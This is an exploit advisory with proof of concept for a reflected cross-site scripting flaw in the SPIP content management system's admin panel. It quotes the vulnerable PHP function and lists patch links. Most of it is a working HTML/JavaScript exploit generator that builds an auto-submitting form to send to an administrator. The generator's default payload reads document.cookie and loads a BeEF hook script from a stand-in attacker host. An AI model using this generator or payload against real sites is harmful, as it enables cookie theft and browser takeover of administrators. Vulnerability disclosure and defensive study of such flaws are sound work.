###################################################################
#
# Exploit Title: SPIP Core <= 3.0.1, 2.1.14, 2.0.19 XSS admin panel
# Google Dork:
# Date: 13/06/2012
# Exploit Author: x@s
# Vendor Homepage: http://www.spip.net/
# Software Link: http://www.spip.net/
# Version: <= 3.0.1, 2.1.14 or 2.0.19
# Tested on: Firefox 13
#
###################################################################

Affected file:
--------------
/spip/ecrire/inc/admin.php

###################################################################

Vuln function:
--------------
function copy_request($script, $suite, $submit='') {
	include_spip('inc/filtres');
	foreach(array_merge($_POST,$_GET) as $n => $c) {
		if (!in_array($n,array('fichier','exec','validation_admin')) AND !is_array($c))
			$suite .= "\n<input type='hidden' name='$n' value='" . entites_html($c) . "' />";
	}
	return generer_form_ecrire($script, $suite, '', $submit);
}

###################################################################

Details:
--------
The array key $n — the name of each request parameter taken from array_merge($_POST, $_GET) — is not escaped before being written into the name attribute of the generated hidden input, whereas the value $c is passed through entites_html(). A parameter name containing a single quote therefore closes the attribute and the rest of the name is emitted as markup; the key needs the same escaping as the value.

###################################################################

Needs:
------
magic_quotes_gpc must be disabled.
Compatible with Firefox 13 but not Chrome.
################################################################### Exploit generator: ------------------ <html> <head> <script> function trim(s){ return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,''); } function encodeToHex(s){ var r=""; var h; for(var c=0;c<s.length;c++){ h=s.charCodeAt(c).toString(16); while(h.length<3) h="%"+h; r+=h; } return r; } function generateXSS(){ var target = trim(document.getElementById("target").value); var version = trim(document.getElementById("version").value); var content = trim(document.getElementById("content").value); var resultjs = ""; resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>"; resultjs += "<input type='hidden' name='exec' value='" + version + "' />"; resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />"; resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>"; document.getElementById("resultjs").value = resultjs; } </script> </head> <body onload="generateXSS();"> <h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2> <p> This XSS, non-persistent, use POST vars through admin panel.<br /> The target is the attribute "name" of an input markup hidden.<br /> This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br /> Magic_quote_gcp = Off needed. 
</p> <form action="" onsubmit="generateXSS();return false;"> <table> <tr> <td>URL's SPIP Targeted :</td> <td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td> </tr> <tr> <td>SPIP version :</td> <td> <select id="version" onchange="generateXSS();"> <option value="base_repair">3.0.X (up to 3.0.1 included)</option> <option value="admin_repair">2.1.X (up to 2.1.14 included)</option> </select> </td> </tr> <tr> <td>JavaScript code to execute :<br />(without <script> & </script> markup)</td> <td> <textarea cols="70" rows="10" id="content" onkeyup="generateXSS();"> alert(document.cookie); var script = document.createElement("script"); script.type = "text/javascript"; script.src = "http://ha.ck.er.xxx/beEf.js"; document.body.appendChild(script); </textarea> </td> </tr> <tr> <td>Exploit to send to an admin : </td> <td> <textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea> </td> </tr> </table> </form> </body> </html> ################################################################### Patch: ------ SPIP 2.0.X (up to 2.0.20) : http://core.spip.org/projects/spip/repository/revisions/19558 SPIP 2.1.X (up to 2.1.15) : http://core.spip.org/projects/spip/repository/revisions/19559 SPIP 3.0.X (up to 3.0.2) : http://core.spip.org/projects/spip/repository/revisions/19560 ################################################################### Credits: -------- ASafety - x@s - http://blog.asafety.fr/vuln-exploit-poc/xss-spip-core/